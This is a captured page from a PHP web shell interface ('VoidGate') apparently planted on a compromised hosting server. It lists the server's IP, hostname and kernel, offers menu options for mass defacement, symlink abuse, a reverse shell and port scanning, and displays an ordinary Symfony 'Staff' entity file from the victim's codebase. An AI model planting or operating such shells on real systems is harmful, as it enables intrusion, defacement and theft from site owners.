ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
api
/
src
/
AppBundle
/
Entity
/
Viewing: Staff.php
<?php namespace AppBundle\Entity; use Doctrine\ORM\Mapping as ORM; use JMS\Serializer\Annotation as Serializer; /** * Staff * * @ORM\Entity(repositoryClass="AppBundle\Repository\StaffRepository") */ class Staff extends BaseUser { /** * @var \AppBundle\Entity\Company * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Company") * @ORM\JoinColumn(nullable=true) * @Serializer\Groups({"STAFF_DETAILS", "TOKEN_DETAILS"}) * @Serializer\MaxDepth(1) */ private $company; /** * @var \AppBundle\Entity\Agency * * @ORM\ManyToOne(targetEntity="AppBundle\Entity\Agency", inversedBy="staffs") * @ORM\JoinColumn(nullable=true) * @Serializer\Groups({"STAFF_DETAILS", "TOKEN_DETAILS"}) * @Serializer\MaxDepth(1) */ private $agency; public function __construct() { parent::__construct(); $this->active = false; } /** * Set company * * @param \AppBundle\Entity\Company $company * * @return Staff */ public function setCompany(\AppBundle\Entity\Company $company) { $this->company = $company; return $this; } /** * Get company * * @return \AppBundle\Entity\Company */ public function getCompany() { return $this->company; } /** * Set agency * * @param \AppBundle\Entity\Agency $agency * * @return Staff */ public function setAgency(\AppBundle\Entity\Agency $agency = null) { $this->agency = $agency; return $this; } /** * Get agency * * @return \AppBundle\Entity\Agency */ public function getAgency() { return $this->agency; } }
Coded With 💗 by
0x6ick